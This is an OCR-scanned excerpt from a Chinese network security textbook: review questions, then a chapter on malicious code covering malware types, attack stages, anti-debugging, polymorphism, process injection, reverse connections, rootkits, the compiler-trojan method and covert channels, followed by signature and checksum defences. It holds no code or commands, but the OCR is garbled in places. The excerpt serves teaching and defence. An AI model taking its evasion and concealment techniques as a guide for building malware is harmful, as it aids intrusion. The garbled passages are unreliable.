1. 在 网 络 安全 解决 方案 中 ,( ) 是 关键 ,( ) 是 核心 。 

2. 一 个 网 络 安全 方案 要 从 哪些 方面 来 把 握 ? 

3. 在 网 络 安全 中 ,( ) 是 基础 ,( ) 是 核心 ,( ) 是 保证 。 

4. 一 份 安全 解决 方案 的 框架 涉及 哪 6 大 方面 ? 

5. 网 络 系统 的 安全 原则 主要 体现 在 ( 全 Ft jk Ya 和 
6. 常用 的 5 种 安全 产品 分 别 为 ( jt 5 ) i Ne 

7. 简 述 安全 服务 。 

8. 集团 在 网 络 安全 方面 提出 5 方面 的 要 求 分 别 是 )( )( )( )( )。 
9. 项 目的 工作 任务 在 于 的 4 个 方面 分 别 是 什么 ? 

10. 安全 风险 分 析 就 是 对 ( i ONE hs 

11. 解决 方案 的 技术 实施 策略 有 哪些 方面 ? 

6.2 网络 安全 评估 

1. 简 述 安全 评估 标准 的 重要 意义 。 

2. 网 络 安全 评估 服务 包括 哪些 内 容 ? 

3. 对 网 络 系统 的 安全 评估 的 步骤 是 什么 ? 

4. 管理 制度 包括 ( ist yd yt ) 等 。 


第 7 音 计算 机 病毒 与 特洛伊 木马 


本 章 学 习 要 求 

@ 掌握 恶意 代码 防范 方法 、 恶 意 代 码 生 存 技术 和 隐藏 技术 ; 

4 掌握 特洛伊 木马 入 侵 步 又 ,认识 计算 机 病毒 和 网 络 蠕虫 防范 方法 ; 
。 掌握 加 密 网 页 挂 马 解 密 方 法 ,认识 网 页 挂 马 危 害 。 


7.1 恶意 代码 


7.1.1 恶意 代码 攻击 机 制 


1. 恶意 代码 定义 

恶意 代码 (Malicious Codes) 指 经 过 存储 媒体 和 网 络 进行 传播 ,从 一 台 计 算 机 系统 到 另 
外 一 台 计 算 机 系统 ,未 经 授权 认证 破坏 计算 机 系统 完整 性 的 程序 或 代码 。 

恶意 代码 本 质 上 是 计算 机 程序 代码 ,可 以 完成 特定 功能 ,具有 两 个 显著 的 特点 : 非 授 权 
性 和 破坏 性 。 几 种 主要 的 恶意 代码 类 型 及 其 相关 的 定义 说 明 如 表 7-1 所 示 。 


表 7-1 恶意 代码 的 相关 定义 





恶意 代码 类 型 定义 特 ”点 
指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功 
计算 机 病毒 能 或 者 毁坏 数据 ,影响 计算 机 使 用 ,并 能 自我 复制 | 潜伏 、 传 染 和 破坏 


的 一 组 计算 机 指令 或 者 程序 代码 
指 通过 计算 机 网 络 自我 复制 ,消耗 系统 资源 和 网 络 














计算 机 蠕虫 资源 的 程序 扫描 攻击 和 扩散 
a ET ie 
于 训 | 时 作为 人 人 人 这 国定 能 程序 | 党 人 和 

相 抽 拓 为 目 的 各 站、 | 作用 和 





指 通过 蔡 代 或 者 修改 被 系统 管理 员 或 普通 用 户 执 
用 户 级 RootKit 行 的 程序 进入 系统 ,从 而 实现 隐藏 和 创建 后 门 的 | 隐蔽 和 潜伏 
程序 
核心 级 RootKit 指 戏 人 操作 系统 内 核 进行 隐藏 和 创建 后 门 的 程序 隐蔽 和 潜伏 











恶意 代码 包括 计算 机 病毒 (Computer Virus) .蠕虫 (Worms)、 特 洛 伊 木马 (Trojan 
Horse) 逻辑 炸弹 (Logic Bombs) ,病菌 (Bacteria) ,用户 级 RootKit 核心 级 RootKit 脚本 恶 
意 代 码 (Malicious Scripts) 和 恶意 ActiveX 控件 等 。 
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(1) 后 门 程序 (Backdoor) 是 指 那些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 程 
序 。 后 门 是 一 种 登录 系统 的 方法 , 它 不 仅 绕 过 系统 已 有 的 安全 设置 ,而 且 还 能 挫败 系统 上 各 
种 增强 的 安全 设置 。 后 门 能 相互 关联 。 例 如 ,黑客 可 能 使 用 密码 破解 一 个 或 多 个 账号 密码 ; 
黑客 可 能 使 用 一 些 技术 或 利用 系统 的 某 个 漏洞 来 提升 权限 ; 黑客 可 能 会 对 系统 的 配置 文件 
进行 小 部 分 的 修改 ,以 降低 系统 的 防御 性 能 。 也 可 能 会 安装 一 个 木马 程序 ,使 系统 打开 一 个 
安全 漏洞 ,以 利于 黑客 完全 掌握 系统 。 总 之 ,后 门 就 是 留 在 计算 机 系统 中 、 供 某 个 特殊 使 用 
者 通过 某 种 特殊 方式 控制 计算 机 系统 的 途径 。 

在 软件 的 开发 阶段 ,程序 员 常 常会 在 软件 内 创建 后 门 程序 以 便 可 以 修改 程序 设计 中 的 
缺陷 。 但 是 如 果 这 些 后 门 被 其 他 人 知道 ,或 是 在 发 布 软件 之 前 没有 删除 后 门 程序 ,那么 它 就 
成 了 安全 风险 ,容易 被 黑客 当成 漏洞 进行 攻击 。 

(2) 逻辑 炸弹 (Logic Bombs) 是 一 段 依附 在 其 他 软件 中 并 具有 触发 执行 破坏 能 力 的 程 
序 人 代码。 逻辑 炸 弹 的 触发 条 件 具有 多 种 方式 ,包括 计数 器 触发 方式 .时 间 触 发 方式 、 文 件 触 
发 方式 和 特定 用 户 访问 触发 方式 等 。 逻 辑 炸 弹 只 在 触发 条 件 满足 后 , 才 开 始 执 行 逻 辑 炸 弹 
的 破坏 功能 。 人 逻辑 炸弹 一 旦 触发 ,有 可 能 造成 文件 删除 、 服 务 停止 和 软件 中 断 运行 等 破坏 。 
逻辑 炸弹 不 能 复制 自身 ,不 能 感染 其 他 程序 。 

(3) 病菌 (Bacteria) 是 指 具 有 自我 复制 功能 的 独立 程序 。 虽 然 细菌 不 会 直接 攻击 任何 
软件 ,但 是 它 通过 复制 本 身 来 消耗 系统 资源 。 例 如 , 某 个 细菌 先 创建 两 个 文件 ,然后 以 两 个 
文件 为 基础 进行 自我 复制 ,那么 细菌 以 指数 级 快速 增长 ,很 快 就 会 消耗 尽 系 统 的 资源 ,包括 
CPU 内 存 和 磁盘 空间 等 。 

2. 恶意 代码 攻击 机 制 


恶意 代码 的 行为 表现 各 异 ,破坏 程度 千差万别 ,但 攻击 过 程 和 攻击 机 制 大 体 相 同 ,其 整 
个 攻击 过 程 如 图 7-1 所 示 ,主要 分 为 6 个 阶段 。 








确定 攻击 目标 


搜集 目标 信息 "| 亚 意 代码 | 
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(1) 侵入 系统 。 侵 入 系统 是 恶意 代码 实现 其 恶意 目的 的 必要 条 件 。 恶 意 代码 和 人 侵 的 途 
径 很 多 ,如 : 从 互联 网 下 载 的 程序 本 身 就 可 能 含有 恶意 代码 ; 接收 已 经 感染 恶意 代码 的 电 
子 邮 件 ; 从 光盘 或 软盘 向 计算 机 系统 安装 软件 ; 黑客 或 者 攻击 者 故意 将 恶意 代码 植 人 系 
统 等 。 

(2) 维持 或 提升 现 有 特权 。 亚 意 代码 的 传播 与 破坏 必须 盗用 用 户 或 者 进程 的 合法 权限 
才能 完成 。 

(3) 隐蔽 策略 。 为 了 不 让 系统 发 现 恶意 代码 已 经 侵入 系统 ,恶意 代码 可 能 会 通过 改名 、 
删除 源 文件 或 者 修改 系统 的 安全 策略 来 隐藏 自己 。 

(4) 潜伏 。 恶 意 代码 侵入 系统 后 ,进行 潜伏 ,等 待 一 定 的 条 件 , 待 具有 足够 的 权限 时 ,就 
发 作 并 进行 破坏 活动 。 

(5) 破坏 。 恶 意 代码 的 本 质 具有 破坏 性 ,其 目的 是 造成 信息 丢失 、 汇 密 , 破 坏 系 统 完整 
性 等 。 

(6) 重复 (1) 一 (5) 的 过 程 对 新 的 目标 实施 攻击 。 


7.1.2 恶意 代码 实现 技术 


一 段 “ 好 ?的 恶意 代码 ,首先 必须 具有 和 良好 的 隐蔽 性 .生存 性 ,不 能 轻易 被 软件 或 者 用 户 
察觉 ; 其 次 ,必须 具有 良好 的 攻击 性 。 

恶意 代码 的 实现 技术 主要 包括 恶意 代码 生存 技术 、 恶 意 代码 攻击 技术 和 恶意 代码 的 隐 
藏 技术 。 

1. 恶意 代码 生存 技术 

生存 技术 主要 包括 4 个 方面 : 反 跟 踪 技 术 、 加 密 技 术 、 模 糊 变 换 技术 和 自动 生产 技术 。 
反 跟 踪 技 术 可 以 减少 被 发 现 的 可 能 性 ,加 密 技术 是 恶意 代码 自身 保护 的 重要 机 制 。 

1) 反 跟踪 技 术 

恶意 代码 采用 反 跟 踪 技 术 可 以 提高 自身 的 伪装 能 力 和 防 破译 能 力 , 增 加 检测 与 清除 恶 
意 代 码 的 难度 。 

目前 常用 的 反 跟 踪 技 术 有 两 类 : 反动 态 跟踪 技术 和 反 静 态 分析 技 术 。 

反动 态 跟踪 技术 主要 包括 4 方面 的 内 容 : 

(1) 禁止 跟踪 中 断 。 针 对 调试 分 析 工 具 运 行 系统 的 单 步 中 断 和 断 点 中 断 服务 程序 , 恶 
意 代 码 通过 修改 中 断 服务 程序 的 入 口 地 址 实现 其 反 跟 踪 目 的 。“1575” 计 算 机 病毒 采用 该 方 
法 将 堆栈 指针 指向 处 于 中 断 向 量 表 中 的 INT 0~INT 3 区 域 ,阻止 调试 工具 对 其 代码 进行 

(2) 封锁 键盘 输入 和 屏幕 显示 ,破坏 各 种 跟踪 调试 工具 运行 的 必需 环境 。 

(3) 检测 跟踪 法 。 检 测 跟踪 调试 时 和 正常 执行 时 的 运行 环境 、 中 断 入 口 和 时 间 的 差异 ， 
根据 这 些 差异 采取 一 定 的 措施 ,实现 其 反 跟 踪 目 的 。 例 如 ,通过 操作 系统 的 API 函数 试图 
打开 调试 器 的 驱动 程序 句柄 ,检测 调试 器 是 否 被 激活 从 而 确定 代码 是 否 继续 运行 。 

(4) 其 他 反 跟 踪 技 术 。 如 指令 流 队列 法 和 逆 指 令 流 法 等 。 

反 静 态 分 析 技术 主要 包括 两 方面 内 容 : 

(1) 对 程序 代码 分 块 加 密 执 行 。 为 了 防止 程序 代码 通过 反 汇 编 进 行 静 态 分 析 , 程 序 代 
码 以 分 块 的 密 文 形式 装 和 内存, 在 执行 时 由 解密 程序 进行 译 码 , 某 一 段 代码 执行 完毕 后 立即 
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清除 ,保证 任何 时 刻 分 析 者 不 可 能 从 内 存 中 得 到 完整 的 执行 代码 。 

(2) 伪 指 令 法 (Junk Code)。 伪 指令 法 是 指 在 指令 流 中 插入 “ 废 指 令 ”, 使 静态 反 汇 编 无 
法 得 到 全 部 正常 的 指令 ,不 能 有 效 地 进行 静态 分 析 。 例 如 ,Apparition 是 一 种 基于 编译 器 变 
形 的 Win32 平台 的 病毒 ,编译 器 每 次 编译 出 新 的 病毒 体 可 执行 代码 时 都 要 插入 大 量 的 伪 指 
令 , 既 达到 了 变形 的 效果 ,也 实现 了 反 跟 踪 的 目的 。 此 外 , 伪 指 令 技术 还 广泛 应 用 于 宏 病 毒 
与 脚本 恶意 代码 之 中 。 

2) 加 密 技 术 

加 密 技 术 是 恶意 代码 自我 保护 的 一 种 手段 ,加 密 技术 和 反 跟 踪 技 术 的 配合 使 用 ,使 得 分 
析 者 无 法 正常 调试 和 阅读 恶意 代码 ,不 知道 恶意 代码 的 工作 原理 ,也 无 法 抽取 特征 串 。 从 加 
密 的 内 容 上 划分 ,加 密 手 段 分 为 信息 加 密 、 数 据 加 密 和 程序 代码 加 密 3 种 。 

大 多 数 恶意 代码 对 程序 体 自身 加 密 , 另 有 少数 恶意 代码 对 被 感染 的 文件 加 密 。 例 如 ， 
Cascade 是 第 一 例 采 用 加 密 技术 的 DOS 环境 下 的 恶意 代码 , 它 有 稳定 的 解密 器 ,可 以 解密 
内 存 中 加 密 的 程序 体 。Mad 和 Zombie 是 Cascade 加 密 技 术 的 延伸 ,使 恶意 代码 加 密 技 术 
走向 32 位 的 操作 系统 平台 。 此 外 ,“ 中 国 炸弹 ”(Chinese bomb) 和 “幽灵 病毒 "也 是 这 一 类 恶 
意 代 码 。 

3) 模糊 变换 技术 

利用 模糊 变换 技术 ,恶意 代码 每 感染 一 个 客体 对 象 时 ,潜入 宿主 程序 的 代码 互 不 相同 。 
同一 种 恶意 代码 具有 多 个 不 同样 本 ,几乎 没有 稳定 代码 ,采用 基于 特征 的 检测 工具 一 般 不 能 
识别 它们 。 随 着 这 类 恶意 代码 的 增多 ,不 但 使 得 病毒 检测 和 防御 软件 的 编写 变 得 更 加 困难 ， 
而 且 还 会 增加 反 病 毒 软件 的 误 报 率 。 

4) 自动 生产 技术 

恶意 代码 自动 生产 技术 是 针对 人 工分 析 技 术 而 出 现 的 。 利 用 “计算 机 病毒 生成 器 ”, 即 
使 对 计算 机 病毒 一 无 所 知 的 用 户 , 也 能 组 合 出 算法 不 同 \ 功 能 各 异 的 计算 机 病毒 。“ 多 态 性 
发 生 器 ?可 将 普通 病毒 编译 成 复杂 多 变 的 多 态 性 病毒 。 

多 态 变换 引擎 可 以 使 程序 代码 本 身 发 生变 化 ,并 保持 原 有 功能 。 保 加 利 亚 的 Dark 
Avenger 是 较为 著名 的 一 个 例子 ,这 个 变换 引擎 每 产生 一 个 恶意 代码 ,其 程序 体 都 会 发 生变 
化 , 反 恶 意 代 码 软件 如 果 采 用 基于 特征 的 扫描 技术 ,根本 无 法 检测 和 清除 这 种 恶意 代码 。 

2. 恶意 代码 攻击 技术 

常见 的 攻击 技术 包括 进程 注入 技术 三 线程 技术 、 端 口 复 用 技术 、 超 级 管理 技术 、 端 口 反 
向 连接 技术 和 缓冲 区 溢出 攻击 技术 。 

(1) 进程 注入 技术 。 当 前 操作 系统 中 都 有 系统 服务 和 网 络 服务 ,它们 都 在 系统 启动 时 
自动 加 载 。 进 程 注 入 技术 就 是 将 这 些 与 服务 相关 的 可 执行 代码 作为 载体 ,恶意 代码 程序 将 
自身 嵌入 到 这 些 可 执行 代码 之 中 ,实现 自身 隐藏 和 启动 的 目的 。 

这 种 形式 的 恶意 代码 只 需 安 装 一 次 ,以 后 就 会 被 自动 加 载 到 可 执行 文件 的 进程 中 ,并 且 
会 被 多 个 服务 加 载 。 只 有 系统 关闭 ,服务 才 会 结束 ,所 以 恶意 代码 程序 在 系统 运行 时 始终 保 
持 激 活 状 态 。 比 如 恶意 代码 WinEggDropShell 可 以 注入 Windows 下 的 大 部 分 服务 程序 。 

(2) 三 线程 技术 。 在 Windows 操作 系统 中 引入 了 线程 的 概念 ,一 个 进程 可 以 同时 拥有 
多 个 并 发 线程 。 三 线程 技术 就 是 指 一 个 恶意 代码 进程 同时 开启 了 3 个 线程 ,其 中 一 个 为 主 
线程 ,负责 远程 控制 的 工作 ; 另外 两 个 辅助 线程 是 监视 线程 和 守护 线程 ,监视 线程 负责 检查 


第 7 章 计算 机 病毒 与 特洛伊 木马 237 





恶意 代码 程序 是 否 被 删除 或 被 停止 自 启动 。 

守护 线程 注入 其 他 可 执行 文件 内 ,与 恶意 代码 进程 同步 ,一 旦 进程 被 停止 , 它 就 会 重新 
启动 该 进程 ,并 向 主线 程 提供 必要 的 数据 ,这 样 就 能 保证 恶意 代码 运行 的 可 持续 性 。 例 如 ， 
“中 国 黑客 ”等 就 是 采用 这 种 技术 的 恶意 代码 。 

(3) 端口 复 用 技术 。 端 口 复 用 技术 , 系 指 重 复 利 用 系统 网 络 打开 的 端口 (如 25、80、135 
和 139 等 常用 端口 ) 传 送 数据 ,这 样 既 可 以 欺骗 防火 墙 , 又 可 以 少 开 新 端口 。 端 口 复 用 是 在 
保证 端口 默认 服务 正常 工作 的 条 件 下 复 用 ,具有 很 强 的 欺骗 性 。 例 如 ,特洛伊 木马 
Executor 利用 80 端口 传递 控制 信息 和 数据 ,实现 其 远程 控制 的 目的 。 

(4) 超级 管理 技术 。 一 些 恶意 代码 还 具有 攻击 反 恶 意 代码 软件 的 能 力 。 为 了 对 抗 反 恶 
意 代码 软件 ,恶意 代码 采用 超级 管理 技术 对 反 恶 意 代 码 软 件 系统 进行 拒绝 服务 攻击 ,使 反 恶 
意 代码 软件 无 法 正常 运行 。 例 如 ,“ 广 外 女生 ”是 一 个 国产 的 特洛伊 木马 , 它 采 用 超级 管理 技 
术 对 “金山 毒霸 ”和 “天 网 防火 墙 ”进行 拒绝 服务 攻击 。 

(5) 端口 反 向 连接 技术 。 防 火 墙 对 于 外 部 网 络 进 入 内 部 网 络 的 数据 流 有 严格 的 访问 控 
制 策 略 ,但 对 于 从 内 网 到 外 网 的 数据 却 玖 于 防范 。 端 口 反 向 连接 技术 ,就 是 通过 指令 恶意 代 
码 攻 击 的 服务 端 (被 控制 端 ) 主 动 连接 客户 端 ( 控 制 端 ) 的 技术 。 

国外 的 Boinet 是 最 先 实现 这 项 技术 的 木马 程序 , 它 可 以 通过 ICO、IRC、HTTP 和 反 向 
主动 连接 这 4 种 方式 联系 客户 端 。 国 内 最 早 实 现 端口 反 向 连接 技术 的 恶意 代码 是 “网 络 神 
偷 ”.。“ 灰 铝 子 ? 则 是 这 项 技术 的 集大成 者 , 它 内 置 FTP、 域 名 、 服 务 端 主 动 连接 这 3 种 服务 
端 在 线 通知 功能 。 

(6) 缓冲 区 溢出 攻击 技术 。 缓 冲 区 溢出 漏洞 攻击 占 远程 网 络 攻击 的 80% ,这 种 攻击 可 
以 使 一 个 匿名 的 Internet 用 户 有 机 会 获得 一 台 主 机 的 部 分 或 全 部 的 控制 权 , 代 表 了 一 类 严 
重 的 安全 威胁 。 恶 意 代 码 利用 系统 和 网 络 服务 的 安全 漏洞 植 人 并 且 执 行 攻击 代码 ,攻击 代 
码 以 一 定 的 权限 运行 有 缓冲 区 溢出 漏洞 的 程序 ,从 而 获得 被 攻击 主机 的 控制 权 。 

缓冲 区 溢出 攻击 成 为 恶意 代码 从 被 动 式 传播 转 为 主动 式 传播 的 主要 途径 。 例 如 ,“ 红 色 
代码 ?利用 IIS Server 上 Indexing Service 的 缓冲 区 溢出 漏洞 完成 攻击 ,传播 和 破坏 等 恶意 
目的 .“ 尼 姆 达 蠕 虫 " 利 用 IIS 4.0/5.0 DirectoryTraversal 的 弱点 ,以 及 “红色 代码 下” 所 留 
下 的 后 门 ,完成 其 传播 过 程 。 

3. 恶意 代码 的 隐藏 技术 

隐藏 通常 包括 本 地 隐藏 和 网 络 隐藏 。 其 中 本 地 隐藏 主要 有 文件 隐藏 .进程 隐藏 、 网 络 连 
接 隐藏 ,内核 模 块 隐藏 ,编译 器 隐藏 等 ; 网 络 隐藏 主要 包括 通信 内 容 隐 藏 和 传输 通道 隐藏 。 

1) 本 地 隐藏 

本 地 隐藏 是 指 为 了 防止 本 地 系统 管理 人 员 觉 察 而 采取 的 隐藏 手段 。 本 地 系统 管理 人 员 
通常 使 用 “查看 进程 列表 ”查看 目录 ”查看 内 核 模 块 "“ 查 看 系统 网 络 连 接 状 态 ” 等 管理 命令 
来 检测 系统 是 否 被 植 人 了 恶意 代码 。 

其 隐藏 手段 主要 有 3 类 : 一 类 方法 是 将 恶意 代码 隐藏 (附着 ,捆绑 或 替换 ) 在 合法 程序 
中 ,可 以 避 过 简单 管理 命令 的 检查 ; 另 一 方法 是 如 果 恶 意 代码 能 够 修改 或 替换 相应 的 管理 
命令 ,也 就 是 把 相应 管理 命令 恶意 代码 化 ,使 相应 的 输出 信息 经 过 处 理 以 后 再 显示 给 用 户 ， 
就 可 以 很 容易 地 达到 蒙骗 管理 人 员 、 隐 藏 恶意 代码 自身 的 目的 ; 还 有 一 类 方法 是 分 析 管 理 
命令 的 检查 执行 机 制 ,利用 管理 命令 本 身 的 弱点 巧妙 地 避 过 管理 命令 ,可 以 达到 既 不 修改 管 
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理 命令 ,又 达到 隐藏 的 目的 。 

本 地 隐藏 包括 以 下 5 个 方面 。 

(1) 文件 隐藏 。 最 简单 的 方法 是 定制 文件 名 ,使 恶意 代码 的 文件 更 名 为 系统 的 合法 程 
序 文件 名 ,或 者 将 恶意 代码 文件 附加 到 合法 程序 文件 中 。 稍 复杂 的 方法 是 : 恶意 代码 可 以 
修改 与 文件 系统 操作 有 关 的 命令 ,使 它们 在 显示 文件 系统 信息 时 将 恶意 代码 信息 隐藏 起 来 。 
更 复杂 的 方法 是 : 可 以 对 硬盘 进行 低级 操作 ,将 一 些 扇 区 标志 为 坏 块 ,将 文件 隐藏 在 这 些 位 
置 。 恶 意 代码 还 可 以 将 文件 存放 在 引导 区 中 避免 一 般 合法 用 户 发 现 。 当 然 恶 意 代码 程序 在 
安装 完成 或 完成 任务 以 后 ,可 以 删除 原 程序 文件 和 运行 中 留 下 的 痕迹 ,以 隐藏 人 侵 证 据 。 

(2) 进程 隐藏 。 恶 意 代 码 通过 附着 或 替换 系统 进程 ,使 恶意 代码 以 合法 服务 的 身份 运 
行 ,这 样 可 以 很 好 地 隐藏 恶意 代码 。 可 以 通过 修改 进程 列表 程序 ,修改 命令 行 参 数 使 恶意 代 
码 进 程 的 信息 无 法 查询 ,也 可 以 借助 RootKit 技术 实现 进程 隐藏 。 

(3) 网 络 连接 隐藏 。 恶 意 代码 可 以 借用 现 有 服务 的 端口 来 实现 网 络 连接 隐藏 ,如 使 用 
80CHTTP) 端 口 , 将 自己 的 数据 包 设 置 特殊 标识 ,通过 标识 识别 连接 信息 ,未 标识 的 WWW 
服务 网 络 包 仍 转 交 给 原 服务 程序 处 理 。 使 用 隐藏 通道 技术 进行 通信 时 可 以 隐藏 恶意 代码 自 
身 的 网 络 连接 。 

(4) 编译 器 隐藏 。 使 用 该 方法 可 以 实施 原始 分 发 攻击 ,恶意 代码 的 植 人 者 是 编译 器 开 
发 人 员 。 其 主要 思想 如 下 : 

第 一 步 ,修改 编译 器 的 源 代 码 A, 植 人 恶意 代码 ,包括 针对 特定 程序 的 恶意 代码 和 针对 
编译 器 的 恶意 代码 。 经 修改 后 的 编译 器 源码 称 为 B。 

第 二 步 ,用 干净 的 编译 器 C 对 B 进行 编译 得 到 被 感染 的 编译 器 D。 

第 三 步 , 删 除 B, 保 留 D 和 人 A, 将 D 和 A 同时 发 布 。 

以 后 ,无 论 用 户 怎样 修改 系统 源 程序 ,使 用 D 编译 后 的 目标 执行 程序 都 包含 恶意 代码 。 
而 更 严重 的 是 用 户 无 法 查 出 原因 ,因为 被 修改 的 编译 器 源码 B 已 被 删除 ,发 布 的 是 A, 用 户 
无 法 从 源 程 序 中 看 出 破绽 ,即使 用 户 使 用 DD 对 A 重新 进行 编译 ,也 无 法 清除 隐藏 在 编译 器 
二 进 制 代码 中 的 恶意 代码 。 

(5) RootKit 隐藏 。Windows 操作 系统 中 的 Rootkit 分 为 两 类 : 用 户 模 式 下 的 Rootkit 
和 内 核 模式 下 的 Rootkit。 两 种 Rootkit 的 目的 都 是 隐藏 恶意 代码 在 系统 中 的 活动 。 用 户 
模式 下 的 Rootkit 修改 二 进 制 文件 ,或 者 修改 内 存 中 的 一 些 进程 ,同时 保留 它们 受到 限制 的 
通过 API 访问 系统 资源 能 力 。 用 户 模式 下 的 Rootkit 最 显著 的 特点 是 驻 留 在 用 户 模式 下 ， 
需要 的 特权 小 ,更 轻便 ,用 途 也 多 种 多 样 , 它 隐藏 自己 的 方式 是 修改 可 能 发 现 自己 的 进程 。 
例如 ,修改 Netstat. exe, 使 之 不 能 显示 恶意 代码 使 用 的 网 络 连接 。 

内 核 模式 下 的 Rootkit 比 用 户 模式 下 的 Rootkit 隐藏 性 更 好 , 它 直 接 修改 更 底层 的 系统 
功能 ,如 系统 服务 调用 表 , 用 自己 的 系统 服务 调用 函数 替代 原来 的 函数 .或 者 修改 一 些 系统 
内 部 数据 结构 ,比如 活动 进程 链表 等 ,从 而 可 以 更 加 可 靠 地 隐藏 自己 。 

从 上 述 隐 藏 方法 来 看 ,恶意 代码 植 入 的 位 置 越 靠近 操作 系统 底层 越 不 容易 被 检测 出 来 ， 
对 系统 安全 构成 的 威胁 也 就 越 大 。 

2) 网 络 隐藏 

现在 计算 机 用 户 的 安全 意识 较 以 前 有 了 很 大 提高 。 在 网 络 中 ,普遍 采用 了 防火 墙 \ 入 侵 
检测 和 漏洞 扫描 等 安全 措施 。 那 种 使 用 传统 通信 模式 的 恶意 代码 客户 端 与 服务 端 之 间 的 会 
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话 已 不 能 逃避 上 述 安全 措施 的 检测 ,恶意 代码 需要 使 用 更 加 隐藏 的 通信 方式 。 

使 用 加 密 算 法 对 所 传输 的 内 容 进行 加 密 能 够 隐藏 通信 内 容 。 隐 藏 通信 内 容 虽 然 可 以 保 
护 通信 内 容 , 但 无 法 隐藏 通信 状态 ,因此 传输 信道 的 隐藏 也 具有 重要 的 意义 。 对 传输 信道 的 
隐藏 主要 采用 隐藏 通道 技术 。 美 国 国防 部 可 信 操 作 系 统 评测 标准 对 隐藏 通道 进行 了 如 下 
定义 : 

隐藏 通道 是 允许 进程 违反 系统 安全 策略 传输 信息 的 通道 。 

隐藏 通道 分 为 两 种 类 型 : 存储 隐藏 通道 和 时 间 隐 藏 通道 。 存 储 隐 藏 通道 是 一 个 进程 能 
够 直接 或 间接 访问 某 存 储 空间 ,而 该 存储 空间 又 能 够 被 另 一 个 进程 所 访问 ,这 两 个 进程 之 间 
所 形成 的 通道 称 为 存储 隐藏 通道 。 时 间 隐 藏 通道 是 一 个 进程 对 系统 性 能 产生 的 影响 可 以 被 
另外 一 个 进程 观察 到 并 且 可 以 利用 一 个 时 间 基 准 进行 测量 ,这 样 形成 的 信息 传递 通道 称 为 
时 间 隐 藏 通道 。 

在 传统 的 隐藏 通道 研究 中 ,都 是 把 隐藏 通 道 定义 在 操作 系统 的 内 部 ,研究 表明 隐藏 通道 
也 适用 于 网 络 。 发 送 进程 和 接收 进程 共享 一 个 客体 : 网 络 数 据 包 。 发 送 进程 能 够 改变 客 
体 , 也 就 是 可 以 将 客体 进行 形式 变换 ,以 便 进 行 信息 隐藏 。 接 收 进程 能 够 检测 到 客体 的 变 
化 ,也 就 是 可 以 将 客体 还 原 , 将 隐藏 的 信息 解读 出 来 。 对 数据 包 内 容 的 修改 对 应 于 存储 隐藏 
通道 ,对 数据 包 顺 序 进 行 变换 或 者 改变 数据 包 发 送 响应 时 间 则 可 以 对 应 于 时 间 隐 藏 通道 。 

在 TCP/IP 协议 簇 中 ,有 许多 元 余 信息 可 以 用 于 建立 隐藏 通道 。 攻 击 者 可 以 利用 这 些 
隐藏 通道 绕 过 网 络 安全 机 制 秘密 地 传输 数据 。TCP/IP 数据 包 格 式 在 实现 时 为 了 适应 复杂 
多 变 的 网 络 环境 ,有 些 信 息 可 以 使 用 多 种 方式 表示 ,恶意 代码 可 以 利用 这 些 宛 余 信息 进行 

如 果 选 用 安全 策略 允许 的 端口 进行 传输 ,比如 捆绑 在 WWW 通信 服务 中 , 则 可 以 穿 透 
防火 墙 和 避 过 入 侵 检 测 等 系统 的 检测 ,因而 具有 较 强 的 生命 力 。 


7.1.3 恶意 代码 防范 方法 


目前 ,恶意 代码 防范 方法 主要 包括 两 个 方面 : 基于 主机 的 恶意 代码 防范 方法 和 基于 网 
络 的 恶意 代码 防范 方法 。 
1. 基于 主机 的 恶意 代码 防范 方法 


这 类 防范 方法 主要 包括 基于 特征 的 扫描 技术 、 校 验 和 、 沙 箱 技 术 和 安全 操作 系统 对 恶意 
代码 的 防范 等 等 。 

1) 基于 特征 的 扫描 技术 

基于 主机 的 恶意 代码 防范 方法 是 目前 检测 恶意 代码 最 常用 的 技术 ,主要 源 于 模式 匹配 
的 思想 。 扫 描 程 序 工作 之 前 ,必须 先 建立 恶意 代码 的 特征 文件 ,根据 特征 文件 中 的 特征 串 ， 
在 扫描 文件 中 进行 匹配 查找 。 用 户 通过 更 新 特征 文件 更 新 扫描 软件 ,查找 最 新 的 恶意 代码 
版 本 。 这 种 技术 广泛 地 应 用 于 目前 的 反 病毒 引擎 中 ,其 工作 流程 如 图 7-2 所 示 。 

通过 类 型 检测 模块 对 文件 类 型 进行 判断 ,这 是 对 恶意 代码 进行 分 类 的 前 提 , 对 于 压缩 文 
件 , 还 要 先 解压 缩 ,再 将 解压 出 来 的 文件 重新 交 给 类 型 检测 模块 处 理 。 要 考虑 一 个 递归 的 解 
压缩 模块 ,处 理 多 重 和 混合 压缩 等 问题 。 

对 于 非 压缩 类 型 的 对 象 ,按照 类 型 的 不 同 分 为 不 同 的 处 理 方式 。 对 于 可 执行 文件 ,首先 
要 通过 一 个 外 壳 检测 模块 ,判断 是 否 经 过 ASPACK 等 目前 流行 的 可 执行 文件 加 壳 工 具 处 
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图 7-2 恶意 代码 防范 工作 流程 


理 , 这 个 脱 壳 模 块 也 是 递归 的 ,直到 不 需要 脱 壳 处 理 为 止 ,最 后 交 给 二 进 制 检测 引擎 处 理 ; 
对 于 文本 类 型 文件 ,主要 是 进行 脚本 病毒 检测 。 目 前 对 于 VBScript、JavaScript、PHP 和 
Perl 等 多 种 类 型 的 脚本 病毒 ,需要 先 交 给 语法 分 析 器 去 处 理 , 语 法 分 析 器 处 理 后 的 结果 青 交 
给 检测 引擎 做 匹配 处 理 。 部 分 反 病毒 软件 的 宏 病 毒 检 测 就 是 交 给 脚本 处 理 引 擎 完成 的 , 通 
过 Office 预 处 理 提取 出 宏 Basic 源码 之 后 ,也 可 以 同样 交 给 语法 分 析 器 进行 处 理 。 

目前 ,基于 特征 的 扫描 技术 主要 存在 两 个 方面 的 问题 : 一 是 一 种 特征 匹配 算法 ,对 于 加 
密 、 变 形 和 未 知 的 恶意 代码 不 能 很 好 地 处 理 ; 二 是 需要 用 户 不 断 升级 更 新 检测 引擎 和 特征 
数据 库 , 不 能 预警 恶意 代码 入 侵 , 只 能 做 事后 处 理 。 

2) 校 验 和 

校 验 和 是 一 种 保护 信息 资源 完整 性 的 控制 技术 ,例如 Hash 值 和 循环 元 余 码 等 。 只 要 
文件 内 部 有 一 个 比特 发 生 了 变化 , 校 验 和 值 就 会 改变 。 未 被 恶意 代码 感染 的 系统 首先 会 生 
成 检测 数据 ,然后 周期 性 地 使 用 校 验 和 法 检测 文件 的 改变 情况 。 运 用 校 验 和 法 检查 恶意 代 
码 有 3 种 方法 : 

